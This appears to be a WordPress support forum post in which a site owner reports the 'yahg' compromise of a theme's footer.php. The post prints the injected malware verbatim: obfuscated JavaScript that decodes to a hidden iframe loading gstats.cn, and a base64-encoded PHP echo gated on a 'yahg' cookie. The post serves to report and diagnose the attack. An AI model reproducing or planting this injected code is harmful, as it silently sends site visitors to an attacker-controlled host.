yahg vunerability again
-
The yagh bug referred to here just happened in my wordpress system running 2.5.1 in a different form. This previously happened on the previous 2.3.x system back in March exactly like the description in the link above.
The server is running a FC6 fedora with apache and very limited server access. It modified the active theme’s footer.php.
The generated output was :-
</div> <!-- .content --> <script>function EE28C5BB86B6E59028669F5CDC87F6F8(CF2908786055451B){return(parseInt( CF2908786055451B,16));}function E417D2B635CB5916ED753C59F6166C( DCCEDD4FB8B32634B73){function DE1B365014D0708B785C319(){var EE79D2C759494C6B00D1F4FDC747343=2;return EE79D2C759494C6B00D1F4FDC747343;}var E60247718C17F3D8F853817B5="";for(C9B1DAB222ED47955E124DB6F83A9=0; C9B1DAB222ED47955E124DB6F83A9<DCCEDD4FB8B32634B73.length; C9B1DAB222ED47955E124DB6F83A9+=DE1B365014D0708B785C319()){ E60247718C17F3D8F853817B5+=( String.fromCharCode( EE28C5BB86B6E59028669F5CDC87F6F8(DCCEDD4FB8B32634B73.substr( C9B1DAB222ED47955E124DB6F83A9,DE1B365014D0708B785C319()))));}eval( E60247718C17F3D8F853817B5);}E417D2B635CB5916ED753C59F6166C(" 646F63756D656E742E777269746528223C696672616D65207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E22293B ");</script> <div class ="clear"></div> </div> <!-- Close Page -->
It attached itself to the top of the K2 theme footer.php.
<?php if (!isset($_COOKIE["yahg"])) echo base64_decode('PHNjcmlwdD5mdW5jdGlvbiBFRTI4QzVCQjg2QjZFNTkwMjg2NjlGNUNEQzg3RjZGOChDRjI5MDg3ODYwNTU0NTFCKXtyZXR1cm4ocGFyc2VJbnQoQ0YyOTA4Nzg2MDU1NDUxQiwxNikpO31mdW5jdGlvbiBFNDE3RDJCNjM1Q0I1OTE2RUQ3NTNDNTlGNjE2NkMoRENDRURENEZCOEIzMjYzNEI3Myl7ZnVuY3Rpb24gREUxQjM2NTAxNEQwNzA4Qjc4NUMzMTkoKXt2YXIgRUU3OUQyQzc1OTQ5NEM2QjAwRDFGNEZEQzc0NzM0Mz0yO3JldHVybiBFRTc5RDJDNzU5NDk0QzZCMDBEMUY0RkRDNzQ3MzQzO312YXIgRTYwMjQ3NzE4QzE3RjNEOEY4NTM4MTdCNT0iIjtmb3IoQzlCMURBQjIyMkVENDc5NTVFMTI0REI2RjgzQTk9MDtDOUIxREFCMjIyRUQ0Nzk1NUUxMjREQjZGODNBOTxEQ0NFREQ0RkI4QjMyNjM0QjczLmxlbmd0aDtDOUIxREFCMjIyRUQ0Nzk1NUUxMjREQjZGODNBOSs9REUxQjM2NTAxNEQwNzA4Qjc4NUMzMTkoKSl7RTYwMjQ3NzE4QzE3RjNEOEY4NTM4MTdCNSs9KCBTdHJpbmcuZnJvbUNoYXJDb2RlKEVFMjhDNUJCODZCNkU1OTAyODY2OUY1Q0RDODdGNkY4KERDQ0VERDRGQjhCMzI2MzRCNzMuc3Vic3RyKEM5QjFEQUIyMjJFRDQ3OTU1RTEyNERCNkY4M0E5LERFMUIzNjUwMTREMDcwOEI3ODVDMzE5KCkpKSkpO31ldmFsKEU2MDI0NzcxOEMxN0YzRDhGODUzODE3QjUpO31FNDE3RDJCNjM1Q0I1OTE2RUQ3NTNDNTlGNjE2NkMoIjY0NkY2Mzc1NkQ2NTZFNzQyRTc3NzI2OTc0NjUyODIyM0M2OTY2NzI2MTZENjUyMDczNzI2MzNENjg3NDc0NzAzQTJGMkY2NzczNzQ2MTc0NzMyRTYzNkUyMDczNzQ3OTZDNjUzRDY0Njk3MzcwNkM2MTc5M0E2RTZGNkU2NTNFM0MyRjY5NjY3MjYxNkQ2NTNFMjIyOTNCIik7PC9zY3JpcHQ+'); /* K2 Hook */ do_action('template_after_content'); ?> <div class="clear"></div> </div> <!-- Close Page -->
I have no idea how it modified the file. The date/time were the same as the offsite copy. Nothing else in the system was affected, so I’d guess that it was wordpress vunerability. Just bringing it to your attention.
- The topic ‘yahg vunerability again’ is closed to new replies.